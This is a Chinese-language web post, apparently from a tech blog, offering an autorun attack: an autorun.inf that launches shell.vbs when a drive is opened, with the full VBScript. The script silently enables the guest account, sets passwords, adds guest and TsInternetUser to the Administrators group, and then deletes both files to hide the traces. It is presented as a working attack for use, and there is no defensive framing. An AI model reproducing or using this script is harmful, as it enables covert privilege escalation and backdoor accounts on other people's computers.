当前位置: 首页 > 技术 > 正文

让管理员打开硬盘时加载木马或者添加管理员号

auto.ini 加 SHELL.VBS

autorun.inf内容如下
[autorun]
open=shell.vbs

shell.vbs内容如下

引用内容
dim wsh
set wsh=CreateObject(WScript.Shell)
wsh.run net user guest activeyes,0
wsh.run net user guest wybanly886,0
wsh.run net localgroup administrators guest add,0
wsh.run net user TsInternetUser wybanly886,0
wsh.run net localgroup administrators TsInternetUser add,0
wsh.run cmd.exe c del autorun.inf,0
wsh.run cmd.exe c del shell.vbs,0

相关推荐

《让管理员打开硬盘时加载木马或者添加管理员号》等您坐沙发呢!

发表评论